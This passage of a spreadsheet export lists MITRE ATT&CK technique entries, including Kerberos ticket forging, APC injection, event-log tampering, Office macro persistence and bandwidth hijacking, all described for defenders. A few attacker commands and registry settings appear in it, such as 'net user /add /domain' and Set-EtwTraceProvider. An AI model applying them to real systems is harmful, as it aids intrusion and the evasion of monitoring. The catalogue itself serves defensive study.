Other accessibility features exist that may also be leveraged in a similar fashion: (Citation: DEFCON2016 Sticky Keys)(Citation: Narrator Accessibility Abuse)
* On-Screen Keyboard: &lt;code&gt;C:\Windows\System32\osk.exe&lt;/code&gt;
* Magnifier: &lt;code&gt;C:\Windows\System32\Magnify.exe&lt;/code&gt;
* Narrator: &lt;code&gt;C:\Windows\System32\Narrator.exe&lt;/code&gt;
* Display Switcher: &lt;code&gt;C:\Windows\System32\DisplaySwitch.exe&lt;/code&gt;
* App Switcher: &lt;code&gt;C:\Windows\System32\AtBroker.exe&lt;/code&gt;
https://attack.mitre.org/techniques/T1546/008</t>
  </si>
  <si>
    <t>T1496.002</t>
  </si>
  <si>
    <t>Bandwidth Hijacking</t>
  </si>
  <si>
    <t>Adversaries may leverage the network bandwidth resources of co-opted systems to complete resource-intensive tasks, which may impact system and/or hosted service availability. 
Adversaries may also use malware that leverages a system's network bandwidth as part of a botnet in order to facilitate [Network Denial of Service](https://attack.mitre.org/techniques/T1498) campaigns and/or to seed malicious torrents.(Citation: GoBotKR) Alternatively, they may engage in proxyjacking by selling use of the victims' network bandwidth and IP address to proxyware services.(Citation: Sysdig Proxyjacking) Finally, they may engage in internet-wide scanning in order to identify additional targets for compromise.(Citation: Unit 42 Leaked Environment Variables 2024)
In addition to incurring potential financial costs or availability disruptions, this technique may cause reputational damage if a victim’s bandwidth is used for illegal activities.(Citation: Sysdig Proxyjacking)
https://attack.mitre.org/techniques/T1496/002</t>
  </si>
  <si>
    <t>T1087</t>
  </si>
  <si>
    <t>Account Discovery</t>
  </si>
  <si>
    <t>Adversaries may attempt to get a listing of valid accounts, usernames, or email addresses on a system or within a compromised environment. This information can help adversaries determine which accounts exist, which can aid in follow-on behavior such as brute-forcing, spear-phishing attacks, or account takeovers (e.g., [Valid Accounts](https://attack.mitre.org/techniques/T1078)).
Adversaries may use several methods to enumerate accounts, including abuse of existing tools, built-in commands, and potential misconfigurations that leak account names and roles or permissions in the targeted environment.
For examples, cloud environments typically provide easily accessible interfaces to obtain user lists.(Citation: AWS List Users)(Citation: Google Cloud - IAM Servie Accounts List API) On hosts, adversaries can use default [PowerShell](https://attack.mitre.org/techniques/T1059/001) and other command line functionality to identify accounts. Information about email addresses and accounts may also be extracted by searching an infected system’s files.
https://attack.mitre.org/techniques/T1087</t>
  </si>
  <si>
    <t>T1090</t>
  </si>
  <si>
    <t>Proxy</t>
  </si>
  <si>
    <t>Adversaries may use a connection proxy to direct network traffic between systems or act as an intermediary for network communications to a command and control server to avoid direct connections to their infrastructure. Many tools exist that enable traffic redirection through proxies or port redirection, including [HTRAN](https://attack.mitre.org/software/S0040), ZXProxy, and ZXPortMap. (Citation: Trend Micro APT Attack Tools) Adversaries use these types of proxies to manage command and control communications, reduce the number of simultaneous outbound network connections, provide resiliency in the face of connection loss, or to ride over existing trusted communications paths between victims to avoid suspicion. Adversaries may chain together multiple proxies to further disguise the source of malicious traffic.
Adversaries can also take advantage of routing schemes in Content Delivery Networks (CDNs) to proxy command and control traffic.
https://attack.mitre.org/techniques/T1090</t>
  </si>
  <si>
    <t>T1059</t>
  </si>
  <si>
    <t>Command and Scripting Interpreter</t>
  </si>
  <si>
    <t>Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of [Unix Shell](https://attack.mitre.org/techniques/T1059/004) while Windows installations include the [Windows Command Shell](https://attack.mitre.org/techniques/T1059/003) and [PowerShell](https://attack.mitre.org/techniques/T1059/001).
There are also cross-platform interpreters such as [Python](https://attack.mitre.org/techniques/T1059/006), as well as those commonly associated with client applications such as [JavaScript](https://attack.mitre.org/techniques/T1059/007) and [Visual Basic](https://attack.mitre.org/techniques/T1059/005).
Adversaries may abuse these technologies in various ways as a means of executing arbitrary commands. Commands and scripts can be embedded in [Initial Access](https://attack.mitre.org/tactics/TA0001) payloads delivered to victims as lure documents or as secondary payloads downloaded from an existing C2. Adversaries may also execute commands through interactive terminals/shells, as well as utilize various [Remote Services](https://attack.mitre.org/techniques/T1021) in order to achieve remote Execution.(Citation: Powershell Remote Commands)(Citation: Cisco IOS Software Integrity Assurance - Command History)(Citation: Remote Shell Execution in Python)
https://attack.mitre.org/techniques/T1059</t>
  </si>
  <si>
    <t>T1562.006</t>
  </si>
  <si>
    <t>Indicator Blocking</t>
  </si>
  <si>
    <t>An adversary may attempt to block indicators or events typically captured by sensors from being gathered and analyzed. This could include maliciously redirecting(Citation: Microsoft Lamin Sept 2017) or even disabling host-based sensors, such as Event Tracing for Windows (ETW)(Citation: Microsoft About Event Tracing 2018), by tampering settings that control the collection and flow of event telemetry.(Citation: Medium Event Tracing Tampering 2018) These settings may be stored on the system in configuration files and/or in the Registry as well as being accessible via administrative utilities such as [PowerShell](https://attack.mitre.org/techniques/T1059/001) or [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047).
For example, adversaries may modify the `File` value in &lt;code&gt;HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Security&lt;/code&gt; to hide their malicious actions in a new or different .evtx log file. This action does not require a system reboot and takes effect immediately.(Citation: disable_win_evt_logging) 
ETW interruption can be achieved multiple ways, however most directly by defining conditions using the [PowerShell](https://attack.mitre.org/techniques/T1059/001) &lt;code&gt;Set-EtwTraceProvider&lt;/code&gt; cmdlet or by interfacing directly with the Registry to make alterations.
In the case of network-based reporting of indicators, an adversary may block traffic associated with reporting to prevent central analysis. This may be accomplished by many means, such as stopping a local process responsible for forwarding telemetry and/or creating a host-based firewall rule to block traffic to specific hosts responsible for aggregating events, such as security information and event management (SIEM) products.
In Linux environments, adversaries may disable or reconfigure log processing tools such as syslog or nxlog to inhibit detection and monitoring capabilities to facilitate follow on behaviors (Citation: LemonDuck).
https://attack.mitre.org/techniques/T1562/006</t>
  </si>
  <si>
    <t>T1136.002</t>
  </si>
  <si>
    <t>Adversaries may create a domain account to maintain access to victim systems. Domain accounts are those managed by Active Directory Domain Services where access and permissions are configured across systems and services that are part of that domain. Domain accounts can cover user, administrator, and service accounts. With a sufficient level of access, the &lt;code&gt;net user /add /domain&lt;/code&gt; command can be used to create a domain account.(Citation: Savill 1999)
Such accounts may be used to establish secondary credentialed access that do not require persistent remote access tools to be deployed on the system.
https://attack.mitre.org/techniques/T1136/002</t>
  </si>
  <si>
    <t>T1589.003</t>
  </si>
  <si>
    <t>Employee Names</t>
  </si>
  <si>
    <t>Adversaries may gather employee names that can be used during targeting. Employee names be used to derive email addresses as well as to help guide other reconnaissance efforts and/or craft more-believable lures.
Adversaries may easily gather employee names, since they may be readily available and exposed via online or other accessible data sets (ex: [Social Media](https://attack.mitre.org/techniques/T1593/001) or [Search Victim-Owned Websites](https://attack.mitre.org/techniques/T1594)).(Citation: OPM Leak) Gathering this information may reveal opportunities for other forms of reconnaissance (ex: [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593) or [Phishing for Information](https://attack.mitre.org/techniques/T1598)), establishing operational resources (ex: [Compromise Accounts](https://attack.mitre.org/techniques/T1586)), and/or initial access (ex: [Phishing](https://attack.mitre.org/techniques/T1566) or [Valid Accounts](https://attack.mitre.org/techniques/T1078)).
https://attack.mitre.org/techniques/T1589/003</t>
  </si>
  <si>
    <t>T1482</t>
  </si>
  <si>
    <t>Domain Trust Discovery</t>
  </si>
  <si>
    <t>Adversaries may attempt to gather information on domain trust relationships that may be used to identify lateral movement opportunities in Windows multi-domain/forest environments. Domain trusts provide a mechanism for a domain to allow access to resources based on the authentication procedures of another domain.(Citation: Microsoft Trusts) Domain trusts allow the users of the trusted domain to access resources in the trusting domain. The information discovered may help the adversary conduct [SID-History Injection](https://attack.mitre.org/techniques/T1134/005), [Pass the Ticket](https://attack.mitre.org/techniques/T1550/003), and [Kerberoasting](https://attack.mitre.org/techniques/T1558/003).(Citation: AdSecurity Forging Trust Tickets)(Citation: Harmj0y Domain Trusts) Domain trusts can be enumerated using the `DSEnumerateDomainTrusts()` Win32 API call, .NET methods, and LDAP.(Citation: Harmj0y Domain Trusts) The Windows utility [Nltest](https://attack.mitre.org/software/S0359) is known to be used by adversaries to enumerate domain trusts.(Citation: Microsoft Operation Wilysupply)
https://attack.mitre.org/techniques/T1482</t>
  </si>
  <si>
    <t>T1558.001</t>
  </si>
  <si>
    <t>Golden Ticket</t>
  </si>
  <si>
    <t>Adversaries who have the KRBTGT account password hash may forge Kerberos ticket-granting tickets (TGT), also known as a golden ticket.(Citation: AdSecurity Kerberos GT Aug 2015) Golden tickets enable adversaries to generate authentication material for any account in Active Directory.(Citation: CERT-EU Golden Ticket Protection) 
Using a golden ticket, adversaries are then able to request ticket granting service (TGS) tickets, which enable access to specific resources. Golden tickets require adversaries to interact with the Key Distribution Center (KDC) in order to obtain TGS.(Citation: ADSecurity Detecting Forged Tickets)
The KDC service runs all on domain controllers that are part of an Active Directory domain. KRBTGT is the Kerberos Key Distribution Center (KDC) service account and is responsible for encrypting and signing all Kerberos tickets.(Citation: ADSecurity Kerberos and KRBTGT) The KRBTGT password hash may be obtained using [OS Credential Dumping](https://attack.mitre.org/techniques/T1003) and privileged access to a domain controller.
https://attack.mitre.org/techniques/T1558/001</t>
  </si>
  <si>
    <t>T1020</t>
  </si>
  <si>
    <t>Automated Exfiltration</t>
  </si>
  <si>
    <t>Adversaries may exfiltrate data, such as sensitive documents, through the use of automated processing after being gathered during Collection.(Citation: ESET Gamaredon June 2020) 
When automated exfiltration is used, other exfiltration techniques likely apply as well to transfer the information out of the network, such as [Exfiltration Over C2 Channel](https://attack.mitre.org/techniques/T1041) and [Exfiltration Over Alternative Protocol](https://attack.mitre.org/techniques/T1048).
https://attack.mitre.org/techniques/T1020</t>
  </si>
  <si>
    <t>T1592.004</t>
  </si>
  <si>
    <t>Client Configurations</t>
  </si>
  <si>
    <t>Adversaries may gather information about the victim's client configurations that can be used during targeting. Information about client configurations may include a variety of details and settings, including operating system/version, virtualization, architecture (ex: 32 or 64 bit), language, and/or time zone.
Adversaries may gather this information in various ways, such as direct collection actions via [Active Scanning](https://attack.mitre.org/techniques/T1595) (ex: listening ports, server banners, user agent strings) or [Phishing for Information](https://attack.mitre.org/techniques/T1598). Adversaries may also compromise sites then include malicious content designed to collect host information from visitors.(Citation: ATT ScanBox) Information about the client configurations may also be exposed to adversaries via online or other accessible data sets (ex: job postings, network maps, assessment reports, resumes, or purchase invoices). Gathering this information may reveal opportunities for other forms of reconnaissance (ex: [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593) or [Search Open Technical Databases](https://attack.mitre.org/techniques/T1596)), establishing operational resources (ex: [Develop Capabilities](https://attack.mitre.org/techniques/T1587) or [Obtain Capabilities](https://attack.mitre.org/techniques/T1588)), and/or initial access (ex: [Supply Chain Compromise](https://attack.mitre.org/techniques/T1195) or [External Remote Services](https://attack.mitre.org/techniques/T1133)).
https://attack.mitre.org/techniques/T1592/004</t>
  </si>
  <si>
    <t>T1562.007</t>
  </si>
  <si>
    <t>Disable or Modify Cloud Firewall</t>
  </si>
  <si>
    <t>Adversaries may disable or modify a firewall within a cloud environment to bypass controls that limit access to cloud resources. Cloud firewalls are separate from system firewalls that are described in [Disable or Modify System Firewall](https://attack.mitre.org/techniques/T1562/004). 
Cloud environments typically utilize restrictive security groups and firewall rules that only allow network activity from trusted IP addresses via expected ports and protocols. An adversary with appropriate permissions may introduce new firewall rules or policies to allow access into a victim cloud environment and/or move laterally from the cloud control plane to the data plane. For example, an adversary may use a script or utility that creates new ingress rules in existing security groups (or creates new security groups entirely) to allow any TCP/IP connectivity to a cloud-hosted instance.(Citation: Palo Alto Unit 42 Compromised Cloud Compute Credentials 2022) They may also remove networking limitations to support traffic associated with malicious activity (such as cryptomining).(Citation: Expel IO Evil in AWS)(Citation: Palo Alto Unit 42 Compromised Cloud Compute Credentials 2022)
Modifying or disabling a cloud firewall may enable adversary C2 communications, lateral movement, and/or data exfiltration that would otherwise not be allowed. It may also be used to open up resources for [Brute Force](https://attack.mitre.org/techniques/T1110) or [Endpoint Denial of Service](https://attack.mitre.org/techniques/T1499).
https://attack.mitre.org/techniques/T1562/007</t>
  </si>
  <si>
    <t>T1036.002</t>
  </si>
  <si>
    <t>Right-to-Left Override</t>
  </si>
  <si>
    <t>Adversaries may abuse the right-to-left override (RTLO or RLO) character (U+202E) to disguise a string and/or file name to make it appear benign. RTLO is a non-printing Unicode character that causes the text that follows it to be displayed in reverse. For example, a Windows screensaver executable named &lt;code&gt;March 25 \u202Excod.scr&lt;/code&gt; will display as &lt;code&gt;March 25 rcs.docx&lt;/code&gt;. A JavaScript file named &lt;code&gt;photo_high_re\u202Egnp.js&lt;/code&gt; will be displayed as &lt;code&gt;photo_high_resj.png&lt;/code&gt;.(Citation: Infosecinstitute RTLO Technique)
Adversaries may abuse the RTLO character as a means of tricking a user into executing what they think is a benign file type. A common use of this technique is with [Spearphishing Attachment](https://attack.mitre.org/techniques/T1566/001)/[Malicious File](https://attack.mitre.org/techniques/T1204/002) since it can trick both end users and defenders if they are not aware of how their tools display and render the RTLO character. Use of the RTLO character has been seen in many targeted intrusion attempts and criminal activity.(Citation: Trend Micro PLEAD RTLO)(Citation: Kaspersky RTLO Cyber Crime) RTLO can be used in the Windows Registry as well, where regedit.exe displays the reversed characters but the command line tool reg.exe does not by default.
https://attack.mitre.org/techniques/T1036/002</t>
  </si>
  <si>
    <t>T1588.001</t>
  </si>
  <si>
    <t>Adversaries may buy, steal, or download malware that can be used during targeting. Malicious software can include payloads, droppers, post-compromise tools, backdoors, packers, and C2 protocols. Adversaries may acquire malware to support their operations, obtaining a means for maintaining control of remote machines, evading defenses, and executing post-compromise behaviors.
In addition to downloading free malware from the internet, adversaries may purchase these capabilities from third-party entities. Third-party entities can include technology companies that specialize in malware development, criminal marketplaces (including Malware-as-a-Service, or MaaS), or from individuals. In addition to purchasing malware, adversaries may steal and repurpose malware from third-party entities (including other adversaries).
https://attack.mitre.org/techniques/T1588/001</t>
  </si>
  <si>
    <t>T1542.002</t>
  </si>
  <si>
    <t>Component Firmware</t>
  </si>
  <si>
    <t>Adversaries may modify component firmware to persist on systems. Some adversaries may employ sophisticated means to compromise computer components and install malicious firmware that will execute adversary code outside of the operating system and main system firmware or BIOS. This technique may be similar to [System Firmware](https://attack.mitre.org/techniques/T1542/001) but conducted upon other system components/devices that may not have the same capability or level of integrity checking.
Malicious component firmware could provide both a persistent level of access to systems despite potential typical failures to maintain access and hard disk re-images, as well as a way to evade host software-based defenses and integrity checks.
https://attack.mitre.org/techniques/T1542/002</t>
  </si>
  <si>
    <t>T1070</t>
  </si>
  <si>
    <t>Indicator Removal</t>
  </si>
  <si>
    <t>Adversaries may delete or modify artifacts generated within systems to remove evidence of their presence or hinder defenses. Various artifacts may be created by an adversary or something that can be attributed to an adversary’s actions. Typically these artifacts are used as defensive indicators related to monitored events, such as strings from downloaded files, logs that are generated from user actions, and other data analyzed by defenders. Location, format, and type of artifact (such as command or login history) are often specific to each platform.
Removal of these indicators may interfere with event collection, reporting, or other processes used to detect intrusion activity. This may compromise the integrity of security solutions by causing notable events to go unreported. This activity may also impede forensic analysis and incident response, due to lack of sufficient data to determine what occurred.
https://attack.mitre.org/techniques/T1070</t>
  </si>
  <si>
    <t>T1048.001</t>
  </si>
  <si>
    <t>Exfiltration Over Symmetric Encrypted Non-C2 Protocol</t>
  </si>
  <si>
    <t>Adversaries may steal data by exfiltrating it over a symmetrically encrypted network protocol other than that of the existing command and control channel. The data may also be sent to an alternate network location from the main command and control server. 
Symmetric encryption algorithms are those that use shared or the same keys/secrets on each end of the channel. This requires an exchange or pre-arranged agreement/possession of the value used to encrypt and decrypt data. 
Network protocols that use asymmetric encryption often utilize symmetric encryption once keys are exchanged, but adversaries may opt to manually share keys and implement symmetric cryptographic algorithms (ex: RC4, AES) vice using mechanisms that are baked into a protocol. This may result in multiple layers of encryption (in protocols that are natively encrypted such as HTTPS) or encryption in protocols that not typically encrypted (such as HTTP or FTP).
https://attack.mitre.org/techniques/T1048/001</t>
  </si>
  <si>
    <t>T1137.001</t>
  </si>
  <si>
    <t>Office Template Macros</t>
  </si>
  <si>
    <t>Adversaries may abuse Microsoft Office templates to obtain persistence on a compromised system. Microsoft Office contains templates that are part of common Office applications and are used to customize styles. The base templates within the application are used each time an application starts. (Citation: Microsoft Change Normal Template)
Office Visual Basic for Applications (VBA) macros (Citation: MSDN VBA in Office) can be inserted into the base template and used to execute code when the respective Office application starts in order to obtain persistence. Examples for both Word and Excel have been discovered and published. By default, Word has a Normal.dotm template created that can be modified to include a malicious macro. Excel does not have a template file created by default, but one can be added that will automatically be loaded.(Citation: enigma0x3 normal.dotm)(Citation: Hexacorn Office Template Macros) Shared templates may also be stored and pulled from remote locations.(Citation: GlobalDotName Jun 2019) 
Word Normal.dotm location:&lt;br&gt;
&lt;code&gt;C:\Users\&amp;lt;username&amp;gt;\AppData\Roaming\Microsoft\Templates\Normal.dotm&lt;/code&gt;
Excel Personal.xlsb location:&lt;br&gt;
&lt;code&gt;C:\Users\&amp;lt;username&amp;gt;\AppData\Roaming\Microsoft\Excel\XLSTART\PERSONAL.XLSB&lt;/code&gt;
Adversaries may also change the location of the base template to point to their own by hijacking the application's search order, e.g. Word 2016 will first look for Normal.dotm under &lt;code&gt;C:\Program Files (x86)\Microsoft Office\root\Office16\&lt;/code&gt;, or by modifying the GlobalDotName registry key. By modifying the GlobalDotName registry key an adversary can specify an arbitrary location, file name, and file extension to use for the template that will be loaded on application startup. To abuse GlobalDotName, adversaries may first need to register the template as a trusted document or place it in a trusted location.(Citation: GlobalDotName Jun 2019) 
An adversary may need to enable macros to execute unrestricted depending on the system or enterprise security policy on use of macros.
https://attack.mitre.org/techniques/T1137/001</t>
  </si>
  <si>
    <t>T1583.003</t>
  </si>
  <si>
    <t>Adversaries may rent Virtual Private Servers (VPSs) that can be used during targeting. There exist a variety of cloud service providers that will sell virtual machines/containers as a service. By utilizing a VPS, adversaries can make it difficult to physically tie back operations to them. The use of cloud infrastructure can also make it easier for adversaries to rapidly provision, modify, and shut down their infrastructure.
Acquiring a VPS for use in later stages of the adversary lifecycle, such as Command and Control, can allow adversaries to benefit from the ubiquity and trust associated with higher reputation cloud service providers. Adversaries may also acquire infrastructure from VPS service providers that are known for renting VPSs with minimal registration information, allowing for more anonymous acquisitions of infrastructure.(Citation: TrendmicroHideoutsLease)
https://attack.mitre.org/techniques/T1583/003</t>
  </si>
  <si>
    <t>T1213.001</t>
  </si>
  <si>
    <t>Confluence</t>
  </si>
  <si>
    <t>Adversaries may leverage Confluence repositories to mine valuable information. Often found in development environments alongside Atlassian JIRA, Confluence is generally used to store development-related documentation, however, in general may contain more diverse categories of useful information, such as:
* Policies, procedures, and standards
* Physical / logical network diagrams
* System architecture diagrams
* Technical system documentation
* Testing / development credentials (i.e., [Unsecured Credentials](https://attack.mitre.org/techniques/T1552))
* Work / project schedules
* Source code snippets
* Links to network shares and other internal resources
https://attack.mitre.org/techniques/T1213/001</t>
  </si>
  <si>
    <t>T1550.003</t>
  </si>
  <si>
    <t>Pass the Ticket</t>
  </si>
  <si>
    <t>Adversaries may “pass the ticket” using stolen Kerberos tickets to move laterally within an environment, bypassing normal system access controls. Pass the ticket (PtT) is a method of authenticating to a system using Kerberos tickets without having access to an account's password. Kerberos authentication can be used as the first step to lateral movement to a remote system.
When preforming PtT, valid Kerberos tickets for [Valid Accounts](https://attack.mitre.org/techniques/T1078) are captured by [OS Credential Dumping](https://attack.mitre.org/techniques/T1003). A user's service tickets or ticket granting ticket (TGT) may be obtained, depending on the level of access. A service ticket allows for access to a particular resource, whereas a TGT can be used to request service tickets from the Ticket Granting Service (TGS) to access any resource the user has privileges to access.(Citation: ADSecurity AD Kerberos Attacks)(Citation: GentilKiwi Pass the Ticket)
A [Silver Ticket](https://attack.mitre.org/techniques/T1558/002) can be obtained for services that use Kerberos as an authentication mechanism and are used to generate tickets to access that particular resource and the system that hosts the resource (e.g., SharePoint).(Citation: ADSecurity AD Kerberos Attacks)
A [Golden Ticket](https://attack.mitre.org/techniques/T1558/001) can be obtained for the domain using the Key Distribution Service account KRBTGT account NTLM hash, which enables generation of TGTs for any account in Active Directory.(Citation: Campbell 2014)
Adversaries may also create a valid Kerberos ticket using other user information, such as stolen password hashes or AES keys. For example, "overpassing the hash" involves using a NTLM password hash to authenticate as a user (i.e. [Pass the Hash](https://attack.mitre.org/techniques/T1550/002)) while also using the password hash to create a valid Kerberos ticket.(Citation: Stealthbits Overpass-the-Hash)
https://attack.mitre.org/techniques/T1550/003</t>
  </si>
  <si>
    <t>T1609</t>
  </si>
  <si>
    <t>Container Administration Command</t>
  </si>
  <si>
    <t>Adversaries may abuse a container administration service to execute commands within a container. A container administration service such as the Docker daemon, the Kubernetes API server, or the kubelet may allow remote management of containers within an environment.(Citation: Docker Daemon CLI)(Citation: Kubernetes API)(Citation: Kubernetes Kubelet)
In Docker, adversaries may specify an entrypoint during container deployment that executes a script or command, or they may use a command such as &lt;code&gt;docker exec&lt;/code&gt; to execute a command within a running container.(Citation: Docker Entrypoint)(Citation: Docker Exec) In Kubernetes, if an adversary has sufficient permissions, they may gain remote execution in a container in the cluster via interaction with the Kubernetes API server, the kubelet, or by running a command such as &lt;code&gt;kubectl exec&lt;/code&gt;.(Citation: Kubectl Exec Get Shell)
https://attack.mitre.org/techniques/T1609</t>
  </si>
  <si>
    <t>T1083</t>
  </si>
  <si>
    <t>File and Directory Discovery</t>
  </si>
  <si>
    <t>Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from [File and Directory Discovery](https://attack.mitre.org/techniques/T1083) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Many command shell utilities can be used to obtain this information. Examples include &lt;code&gt;dir&lt;/code&gt;, &lt;code&gt;tree&lt;/code&gt;, &lt;code&gt;ls&lt;/code&gt;, &lt;code&gt;find&lt;/code&gt;, and &lt;code&gt;locate&lt;/code&gt;.(Citation: Windows Commands JPCERT) Custom tools may also be used to gather file and directory information and interact with the [Native API](https://attack.mitre.org/techniques/T1106). Adversaries may also leverage a [Network Device CLI](https://attack.mitre.org/techniques/T1059/008) on network devices to gather file and directory information (e.g. &lt;code&gt;dir&lt;/code&gt;, &lt;code&gt;show flash&lt;/code&gt;, and/or &lt;code&gt;nvram&lt;/code&gt;).(Citation: US-CERT-TA18-106A)
Some files and directories may require elevated or specific user permissions to access.
https://attack.mitre.org/techniques/T1083</t>
  </si>
  <si>
    <t>T1568</t>
  </si>
  <si>
    <t>Dynamic Resolution</t>
  </si>
  <si>
    <t>Adversaries may dynamically establish connections to command and control infrastructure to evade common detections and remediations. This may be achieved by using malware that shares a common algorithm with the infrastructure the adversary uses to receive the malware's communications. These calculations can be used to dynamically adjust parameters such as the domain name, IP address, or port number the malware uses for command and control.
Adversaries may use dynamic resolution for the purpose of [Fallback Channels](https://attack.mitre.org/techniques/T1008). When contact is lost with the primary command and control server malware may employ dynamic resolution as a means to reestablishing command and control.(Citation: Talos CCleanup 2017)(Citation: FireEye POSHSPY April 2017)(Citation: ESET Sednit 2017 Activity)
https://attack.mitre.org/techniques/T1568</t>
  </si>
  <si>
    <t>T1036.004</t>
  </si>
  <si>
    <t>Masquerade Task or Service</t>
  </si>
  <si>
    <t>Adversaries may attempt to manipulate the name of a task or service to make it appear legitimate or benign. Tasks/services executed by the Task Scheduler or systemd will typically be given a name and/or description.(Citation: TechNet Schtasks)(Citation: Systemd Service Units) Windows services will have a service name as well as a display name. Many benign tasks and services exist that have commonly associated names. Adversaries may give tasks or services names that are similar or identical to those of legitimate ones.
Tasks or services contain other fields, such as a description, that adversaries may attempt to make appear legitimate.(Citation: Palo Alto Shamoon Nov 2016)(Citation: Fysbis Dr Web Analysis)
https://attack.mitre.org/techniques/T1036/004</t>
  </si>
  <si>
    <t>T1055.004</t>
  </si>
  <si>
    <t>Asynchronous Procedure Call</t>
  </si>
  <si>
    <t>Adversaries may inject malicious code into processes via the asynchronous procedure call (APC) queue in order to evade process-based defenses as well as possibly elevate privileges. APC injection is a method of executing arbitrary code in the address space of a separate live process. 
APC injection is commonly performed by attaching malicious code to the APC Queue (Citation: Microsoft APC) of a process's thread. Queued APC functions are executed when the thread enters an alterable state.(Citation: Microsoft APC) A handle to an existing victim process is first created with native Windows API calls such as &lt;code&gt;OpenThread&lt;/code&gt;. At this point &lt;code&gt;QueueUserAPC&lt;/code&gt; can be used to invoke a function (such as &lt;code&gt;LoadLibrayA&lt;/code&gt; pointing to a malicious DLL). 
A variation of APC injection, dubbed "Early Bird injection", involves creating a suspended process in which malicious code can be written and executed before the process' entry point (and potentially subsequent anti-malware hooks) via an APC. (Citation: CyberBit Early Bird Apr 2018) AtomBombing (Citation: ENSIL AtomBombing Oct 2016) is another variation that utilizes APCs to invoke malicious code previously written to the global atom table.(Citation: Microsoft Atom Table)
Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via APC injection may also evade detection from security products since the execution is masked under a legitimate process.
https://attack.mitre.org/techniques/T1055/004</t>
  </si>
  <si>
    <t>T1020.001</t>
  </si>
  <si>
    <t>Traffic Duplication</t>
  </si>
  <si>
    <t>Adversaries may leverage traffic mirroring in order to automate data exfiltration over compromised infrastructure. Traffic mirroring is a native feature for some devices, often used for network analysis. For example, devices may be configured to forward network traffic to one or more destinations for analysis by a network analyzer or other monitoring device. (Citation: Cisco Traffic Mirroring)(Citation: Juniper Traffic Mirroring)
Adversaries may abuse traffic mirroring to mirror or redirect network traffic through other infrastructure they control. Malicious modifications to network devices to enable traffic redirection may be possible through [ROMMONkit](https://attack.mitre.org/techniques/T1542/004) or [Patch System Image](https://attack.mitre.org/techniques/T1601/001).(Citation: US-CERT-TA18-106A)(Citation: Cisco Blog Legacy Device Attacks)
Many cloud-based environments also support traffic mirroring. For example, AWS Traffic Mirroring, GCP Packet Mirroring, and Azure vTap allow users to define specified instances to collect traffic from and specified targets to send collected traffic to.(Citation: AWS Traffic Mirroring)(Citation: GCP Packet Mirroring)(Citation: Azure Virtual Network TAP)
Adversaries may use traffic duplication in conjunction with [Network Sniffing](https://attack.mitre.org/techniques/T1040), [Input Capture](https://attack.mitre.org/techniques/T1056), or [Adversary-in-the-Middle](https://attack.mitre.org/techniques/T1557) depending on the goals and objectives of the adversary.
https://attack.mitre.org/techniques/T1020/001</t>
  </si>
  <si>
    <t>T1647</t>
  </si>
  <si>
    <t>Plist File Modification</t>
  </si>
  <si>
    <t>Adversaries may modify property list files (plist files) to enable other malicious activity, while also potentially evading and bypassing system defenses. macOS applications use plist files, such as the &lt;code&gt;info.plist&lt;/code&gt; file, to store properties and configuration settings that inform the operating system how to handle the application at runtime. Plist files are structured metadata in key-value pairs formatted in XML based on Apple's Core Foundation DTD. Plist files can be saved in text or binary format.(Citation: fileinfo plist file description) 
Adversaries can modify key-value pairs in plist files to influence system behaviors, such as hiding the execution of an application (i.e. [Hidden Window](https://attack.mitre.org/techniques/T1564/003)) or running additional commands for persistence (ex: [Launch Agent](https://attack.mitre.org/techniques/T1543/001)/[Launch Daemon](https://attack.mitre.org/techniques/T1543/004) or [Re-opened Applications](https://attack.mitre.org/techniques/T1547/007)).
For example, adversaries can add a malicious application path to the `~/Library/Preferences/com.apple.dock.plist` file, which controls apps that appear in the Dock. Adversaries can also modify the &lt;code&gt;LSUIElement&lt;/code&gt; key in an application’s &lt;code&gt;info.plist&lt;/code&gt; file  to run the app in the background. Adversaries can also insert key-value pairs to insert environment variables, such as &lt;code&gt;LSEnvironment&lt;/code&gt;, to enable persistence via [Dynamic Linker Hijacking](https://attack.mitre.org/techniques/T1574/006).(Citation: wardle chp2 persistence)(Citation: eset_osx_flashback)
https://attack.mitre.org/techniques/T1647</t>
  </si>
  <si>
    <t>T1546.009</t>
  </si>
  <si>
    <t>AppCert DLLs</t>
  </si>
  <si>
    <t>Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by AppCert DLLs loaded into processes. Dynamic-link libraries (DLLs) that are specified in the &lt;code&gt;AppCertDLLs&lt;/code&gt; Registry key under &lt;code&gt;HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\&lt;/code&gt; are loaded into every process that calls the ubiquitously used application programming interface (API) functions &lt;code&gt;CreateProcess&lt;/code&gt;, &lt;code&gt;CreateProcessAsUser&lt;/code&gt;, &lt;code&gt;CreateProcessWithLoginW&lt;/code&gt;, &lt;code&gt;CreateProcessWithTokenW&lt;/code&gt;, or &lt;code&gt;WinExec&lt;/code&gt;. (Citation: Elastic Process Injection July 2017)
Similar to [Process Injection](https://attack.mitre.org/techniques/T1055), this value can be abused to obtain elevated privileges by causing a malicious DLL to be loaded and run in the context of separate processes on the computer. Malicious AppCert DLLs may also provide persistence by continuously being triggered by API activity.
https://attack.mitre.org/techniques/T1546/009</t>
  </si>
  <si>
    <t>T1114.003</t>
  </si>
  <si>
    <t>Email Forwarding Rule</t>
  </si>
  <si>
